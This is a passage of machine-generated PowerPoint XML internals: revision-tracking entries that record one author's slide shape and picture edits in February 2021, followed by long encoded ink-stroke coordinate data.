            <ac:spMk id="3" creationId="{476755E0-FD81-4665-ADAB-6987A644BD1A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:04:34.962" v="1079" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="990511004" sldId="471"/>
            <ac:spMk id="5" creationId="{8CF073FC-2A80-4A34-A971-17F6FD4A5B30}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:11:49.791" v="1130"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="990511004" sldId="471"/>
            <ac:spMk id="13" creationId="{EF207D87-BC7C-4A21-8636-199619A12DDC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:10:57.384" v="1118" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="990511004" sldId="471"/>
            <ac:spMk id="14" creationId="{8A8E2E40-C5E7-4B4D-BF63-D051F1788219}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:10:57.384" v="1118" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="990511004" sldId="471"/>
            <ac:grpSpMk id="15" creationId="{5098455D-214C-4A5B-9D5F-2EA049552F7A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:10:25.012" v="1111" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="990511004" sldId="471"/>
            <ac:picMk id="7" creationId="{10312E5A-AD81-4C17-8784-3AB329E7E5EA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:10:57.384" v="1118" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="990511004" sldId="471"/>
            <ac:picMk id="9" creationId="{CEE41CC3-A7BE-465D-B85C-E35840ADFF2F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:10:31.705" v="1113" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="990511004" sldId="471"/>
            <ac:picMk id="11" creationId="{4BB5D5C3-FFB1-4382-B7C6-ED2877D0084D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:32:51.861" v="2428"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4216274746" sldId="472"/>
        </pc:sldMkLst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2" creationId="{C6AB523B-9691-47C6-BF36-34415D7056BB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:12:15.781" v="1133" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4216274746" sldId="472"/>
            <ac:spMk id="3" creationId="{47766151-2849-4ED9-B469-1048DF4B05F1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:12:25.201" v="1153" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4216274746" sldId="472"/>
            <ac:spMk id="4" creationId="{DECBB646-103D-41FE-B7DB-0F4CB6643BC4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:28:57.728" v="2296" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4216274746" sldId="472"/>
            <ac:spMk id="5" creationId="{FD589D9D-2978-4D78-9900-975FAA13BFA4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:26:47.525" v="2273"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4216274746" sldId="472"/>
            <ac:spMk id="7" creationId="{F905D52B-92BD-419C-B0B2-4813CDF41560}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:29:56.393" v="2336" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3426365230" sldId="473"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:31:23.593" v="2415" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="849013073" sldId="474"/>
        </pc:sldMkLst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2" creationId="{AA5D66F7-466A-41D8-9E8B-B21DFE769819}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:31:23.593" v="2415" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="849013073" sldId="474"/>
            <ac:spMk id="3" creationId="{E21252B3-9888-4154-8E8B-815ACC0ADB4B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:37:10.579" v="2430" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1943367271" sldId="475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2:06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48,'-1'0'169,"0"0"0,1 0 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 1,-1 0-1,1 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 1 1,1-1-1,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0 0 0,8 31 1260,-3-13-499,-4-9-704,2-1 0,-1 1 0,1-1 0,1 0 0,9 18 0,-5-10-80,-2-3-25,-4-11-87,0 1 1,0-1 0,-1 1-1,1 0 1,-1-1 0,0 1-1,0 0 1,0 6-1,-1-9 350,1-7-104,-1 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,-2-6 0,-6-49 285,8 56-525,2 0 1,-1 0 0,0 0 0,1 0-1,0-1 1,0 1 0,1 0-1,-1 0 1,1 0 0,0 0 0,1 0-1,-1 0 1,4-7 0,0-1 36,-5 12-82,0 1-1,1-1 1,-1 0-1,0 1 1,0-1-1,0 1 1,1-1-1,-1 0 1,0 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,-1 0 1,1-1-1,-1 1 1,1-1-1,-1 1 1,1 0-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1 0 1,-1-1 0,1 1-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,0 0 1,-1 1-1,2-1 1,41 0-1705,-27 0-1242,0 0-3327,-7 0 3571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1 868,'0'0'136,"0"1"0,0-1-1,0 1 1,0-1 0,0 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 1-1,0-1 1,-1 0 0,1 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 0 0,1 1-1,0-1 1,-1 0 0,1 0 0,-1 1-1,1-1 1,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1-1-1,-1 1 1,1 0 0,0 0 0,-1-1-1,1 1 1,-1 0 0,1 0 0,0-1 0,-1 1-1,1 0 1,0-1 0,0 1 0,-1-1-1,1 1 1,0 0 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1 0,0 1-1,0-1 642,21 32 1764,-20-28-2454,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 1,1 0-1,1 2 0,7 22 204,1 15-152,-10-38-222,0-1-1,0 1 1,1-1 0,-1 1-1,1-1 1,0 0 0,0 0-1,0 0 1,4 3 0,-5 5-1325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8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32 1104,'-8'-24'7777,"6"16"-5111,10 16-1615,-6-5-1181,0-1-1,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 4 0,0-4-358,-1 0 0,1 0 1,0 0-1,0-1 0,0 1 0,0 0 1,0-1-1,1 1 0,-1-1 0,1 1 1,0-1-1,0 0 0,2 3 0,7 2-2237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39 114 88,'5'-1'621,"1"1"0,-1-1 1,1 0-1,-1-1 0,0 1 0,0-1 0,10-5 0,-6 3-453,-1-1 0,0 0 0,0 0 0,0-1 0,0 0 0,7-9 0,-5 7-39,2-4 560,-12 12-668,0 0 1,0-1-1,0 1 1,0 0-1,0-1 0,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 0,-1-1 1,1 1-1,0 0 1,0-1-1,0 1 1,0 0-1,-1-1 0,1 1 1,0 0-1,0-1 1,-1 1-1,1 0 1,0 0-1,-1-1 1,1 1-1,0 0 0,-1 0 1,1-1-1,0 1 1,-1 0-1,1 0 1,-1 0-1,-11-7 822,11 5-696,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,-3 1 0,-20 9 1503,22-10-1563,0 0-1,0 0 1,0 0-1,0 1 0,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1-1,0-1 0,0 1 1,-2 3-1,-5 8 106,6-11-163,1 0-1,0 0 0,0 1 0,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,1 0 0,0 0 0,1 0 0,-2 5 0,-1 11 51,2-18-74,1-1-1,0 0 0,-1 1 1,1-1-1,0 0 1,0 1-1,-1-1 0,1 0 1,0 1-1,1-1 0,-1 1 1,0-1-1,0 0 1,1 1-1,-1-1 0,0 0 1,1 1-1,1 1 0,1 13 38,-3-15-39,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,1 0 0,11 10 55,39 28 68,-46-36-294,0 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,0 0 0,0-1 0,13 1-1,18-8-3751,-35 5 3170,0 0 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,1 0 0,3-4-1,3 0-1627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9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24 428,'2'1'6430,"7"5"-5233,-8 3-896,1 0 0,0-1 0,0 1 0,1-1 0,5 13 0,4 11 60,-2-6-59,-8-20-229,1 1 0,-1-1 0,0 1 0,0-1 0,-1 1 0,1 6 0,-2-11-59,0 0 1,0 0-1,1-1 0,-1 1 1,1 0-1,-1 0 1,1-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0-1 1,2 3-1,-2-2-8,0-1 1,0 0-1,0 0 0,0 1 1,0-1-1,0 1 0,-1-1 1,1 0-1,-1 1 0,1-1 0,-1 1 1,1 0-1,-1 2 0,0-4 62,0 1 1,0-1-1,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 1,-1 0-1,1 1 0,0-1 0,22-50 1640,-11 17-1260,-2 2-108,2 0-1,30-56 1,-22 65-2246,-8 14-7785,-3 3 6709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18 170 108,'13'-4'4428,"17"-5"-2357,-10 2-1751,-1-1 0,0 0 0,-1-2 0,1 0 0,-2-1 0,0-1 0,27-23 0,-43 34-272,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 1 0,-1-1 0,1 0 0,0 1-1,-1-1 1,0 0 0,1-1 0,-1 2 71,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0-1,0 1 1,-1-2 0,0 1 4,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0-1,0 0 1,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0-1,1 0 1,-1 0 0,0 1 0,-3 1 0,-60 38 744,11-9-461,49-28-343,-1 0 1,0 0-1,1 1 1,0 0-1,0 0 0,0 0 1,1 0-1,-8 13 1,11-15-50,-1 0 1,1 0 0,0 0 0,0 1 0,0-1-1,1 1 1,-1-1 0,1 1 0,0-1 0,0 1-1,0-1 1,1 0 0,-1 1 0,1-1 0,-1 1-1,1-1 1,0 0 0,1 1 0,1 4 0,-1-6-21,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0-1-1,1 0 0,-1 1 1,1-1-1,4 2 1,39 12-153,-42-14 138,5 1-326,1 0 0,0-1 0,0 0 0,0-1 0,-1 0-1,1 0 1,0-1 0,10-2 0,74-22-8394,-71 18 5519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0 424,'0'14'9075,"9"39"-5855,23 112 1001,-28-148-4043,-1 1 1,0 0 0,-2 1-1,0 18 1,10 28-42,-6-47-118,-4-16-13,0 0 1,0 0-1,-1 0 0,1 1 1,0-1-1,-1 1 0,1-1 1,-1 0-1,0 1 1,0 4-1,0-6-32,-2-31-7025,-9 5 899,2 13 2918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1 168 836,'2'-11'1108,"1"0"-1,1 0 0,0 1 1,0-1-1,1 1 1,1 0-1,9-14 1,-11 18-802,1 1 0,0-1 1,0 1-1,1 0 1,0 0-1,0 0 1,0 1-1,0 0 1,1 0-1,-1 1 1,1 0-1,0 0 0,0 0 1,0 1-1,0 0 1,1 1-1,-1-1 1,0 1-1,8 0 1,-8 1-257,0 0 1,0 1 0,0-1 0,-1 1 0,1 1 0,0-1-1,-1 1 1,1 0 0,-1 1 0,1-1 0,-1 1 0,0 0-1,0 1 1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,-1 0-1,8 9 1,-7-7-50,0-1 0,-1 1 0,1 0 0,-2 0 0,1 1 0,4 14 0,-7-18 23,-1 0-1,1 1 0,-1-1 0,0 0 0,-1 1 0,1-1 1,-1 1-1,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-4 5 1,2-3 15,0 0 0,0 0 0,-1-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1-1 0,0 0 1,-7 3-1,-11 3-195,-1-1 0,-41 8 0,13-3-1796,48-13 2591,-10 1-13252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2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55 152 944,'0'0'3518,"42"18"1509,-2-9-2774,-38-8-2140,1 0-1,-1 0 1,1 0 0,-1-1 0,1 1-1,-1 0 1,1-1 0,-1 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1-1-1,-1 1 1,1-1 0,-1 1 0,1-1-1,-1 0 1,0 0 0,4-3 0,3 0-32,-1 0 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0-1 0,-1 1 0,8-10 0,-13 14-43,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 1,0-1-1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,-1-4 0,-11-14 807,12 17-796,1 0 0,-1 1 1,0-1-1,0 0 0,0 1 1,-1-1-1,1 1 1,0-1-1,0 1 0,-1-1 1,1 1-1,-1 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,1 0-1,-1 0 1,0 0-1,-3 0 0,-12-3 360,0 0-1,0 2 1,0 0 0,-23 1-1,32 1-359,1 1-1,-1 0 0,0 1 1,1 0-1,0 0 1,-1 1-1,-6 3 0,11-6-41,1 1 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0-1,1 0 1,-1 0 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 1 0,1-1 0,-2 3 0,-9 39 58,11-32-63,0-4 4,-1-1 1,2 0 0,-1 0-1,1 1 1,2 10-1,-2-17-7,-1 1-1,0-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 0,1-1 1,-1 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 0,3-1 1,9-2-4,-1 2 1,-1-1 0,1 0 0,0-1 1,-1-1-1,1 0 0,-1 0 0,0-1 0,12-8 1,12-4 19,-31 16-10,0 0 1,-1 0 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,4-4 0,12-4 38,-18 10-41,-1 0 1,1 0-1,-1 0 1,1-1-1,-1 1 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,0 1 1,0 0-1,12 9 30,-11-9-54,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,1 1 1,-1 0-309,1 0 1,-1 0 0,1 0-1,0 0 1,0-1 0,0 1-1,0-1 1,0 1 0,0-1-1,1 0 1,-1 0 0,5 3 0,15 8-8085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13 396,'0'0'1693,"1"-12"6125,1 12-7515,0 1 0,0-1 0,0 0 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,2 3 0,-1 0-80,0 0 0,0 1 0,1-2 0,-1 1 0,1 0 0,0 0 0,5 3 0,12 19 194,-17-22-411,1-1 1,0 1 0,0 0 0,0-1 0,0 0-1,1 0 1,-1 0 0,1-1 0,8 4 0,-7-3-82,3-5-10,-2-2 47,-1 1-78,-1 0 0,1 0 0,-1-1 1,0 0-1,0 0 0,8-8 1,28-31-392,-30 32 622,-10 15 34,-17 30 220,-2 1 58,9-12-141,-2-1 1,-18 29-1,-6 11 190,-28 75-102,54-109-547,6-17-2050,2-24-3534,7-1 1431,-3 9 2910,-1-7-1657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3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7 68,'0'-7'12284,"-20"27"-10030,-46 107 736,60-115-2851,1 0 0,0 0 0,1 0 0,1 1 1,0 0-1,0 0 0,1-1 0,1 2 1,0 18-1,3-21-121,-1 1 1,2-1 0,-1 0-1,1-1 1,1 1-1,0 0 1,0-1 0,8 11-1,-10-17-64,0-1 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,0-1 1,0 1-1,0-1 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,0-1 0,0 0 0,0 0 1,0 0-1,6 1 0,-8-2-591,1-1-35,0 1 1,-1-1-1,1 1 0,-1-1 0,1 0 0,-1 0 1,1 0-1,-1-1 0,5-2 0,-6 4-113,10-14-4203,-10 3 2205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91 728,'1'2'302,"-1"0"1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0-1 1,-1 1-1,1 0 0,0 0 1,1-1-1,0 3 1,25 17 526,-25-20-839,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0-1-1,1 0 1,-1 0-1,0 1 0,0-1 1,0 0-1,0-1 0,1 1 1,-1 0-1,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 0,3-2 1,15-14 15,5-8 63,-15 12 90,-8 11-21,1 0 1,-1 0 0,0-1 0,0 1 0,0 0-1,0-1 1,0 1 0,0-1 0,-1 1-1,1-1 1,-1 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,-1-2 0,1 3 8,-1 0-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1-1,1-1 1,-2 0 0,1 1 0,0-1 0,0 1 0,0 0-1,-1-1 1,1 1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 1 0,0-1 0,0 1 0,0 0 0,1-1-1,-1 1 1,0 0 0,0 0 0,-2 1 0,-1-2-29,1 1 1,-1 0 0,1 0 0,-1 0 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1 1 0,1 0 0,0 0 0,0 0 0,-5 3 0,-9 9-674,11-8 593,0-1 1,0 2 0,0-1 0,1 1 0,-6 7 0,3 4-3217,6 2-3569,3-15 4001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1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92 900,'-2'1'131,"1"-1"1,-1 1-1,0 0 0,0 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 1 1,0-1-1,-1 0 0,1 1 1,0 0-1,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 1,1 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,1 0 0,-1 0 1,0 0-1,0 0 0,1 0 0,-1 0 1,1 0-1,0-1 0,0 1 1,-1 0-1,3 2 0,1 8 62,-4-12-190,0 1 1,0-1 0,0 1-1,0-1 1,0 1-1,1-1 1,-1 1 0,0-1-1,0 1 1,0-1 0,0 1-1,1-1 1,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,1-1 0,-1 0-1,0 1 1,1-1-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1 0,1-1-1,19 13 100,-19-12-82,1 1 0,0-1 0,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 0 0,1 0-1,-1-1 1,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,0-1 0,1 1 0,2-2 0,1 0 44,0-1-1,1 0 1,-1-1 0,-1 1 0,1-1 0,0-1 0,-1 1 0,0-1 0,0 1 0,0-2 0,-1 1-1,8-11 1,5-6 491,-15 19-331,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0-7 0,-1 5-66,0 4-92,0 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0-1 1,0 1-1,0 1 1,-1-1 0,1 0-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,0-1-1,0 0 1,1 0-1,-2 0 1,-11-24 2161,11 23-2135,0 0-1,-1 0 1,1 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0 0 1,-5-1-1,2 1-28,2 0 7,-1 0 1,1 0-1,-1 0 0,1 1 1,0-1-1,-1 1 0,1 0 1,0 0-1,0 1 0,-1-1 0,1 1 1,-4 2-1,4-2-8,-25 17 262,27-18-317,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,1-1 0,-1 1 1,1 0-1,-1 2 0,-10 26-31,11-28 23,0-1-1,1 1 0,-1-1 0,1 1 0,-1-1 1,1 0-1,0 1 0,-1-1 0,1 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,0 0 0,0 0 1,1-1-1,-1 1 0,1 0 0,-1-1 0,1 1 1,-1-1-1,0 0 0,1 1 0,-1-1 0,1 0 1,0 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,1-1-1,68-7 22,-65 6-32,-3 1 11,1 0-1,-1 1 0,0-1 1,0 1-1,1-1 0,-1 1 0,0 0 1,1 0-1,-1 0 0,6 2 1,1-1-21,-6 0 5,0-1-1,0 1 1,-1 0-1,1 0 0,0 1 1,-1-1-1,1 1 1,-1 0-1,4 2 1,-3-2 59,-1 0 0,1 0-1,0 0 1,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,6 1 0,-9-2-77,1 1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1 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41 204,'0'-1'2559,"0"2"-1685,0-7 1743,1 7-2491,-1-1 1,0 0 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1 0,-1 0-1,1 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 0-1,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,-1 1-1,1-1 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,0-1-1,-13 15 831,-16 16-580,21-19-210,5 6 128,3-16-262,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1 0,0 2 0,8 40 406,-2-10-376,-6-31-62,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,2 1 0,0-1 8,-1 0-1,1-1 1,0 1-1,-1-1 1,1 1-1,-1-1 1,1 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,2-1 0,7-2 63,-1 0 1,0 0 0,0-2 0,0 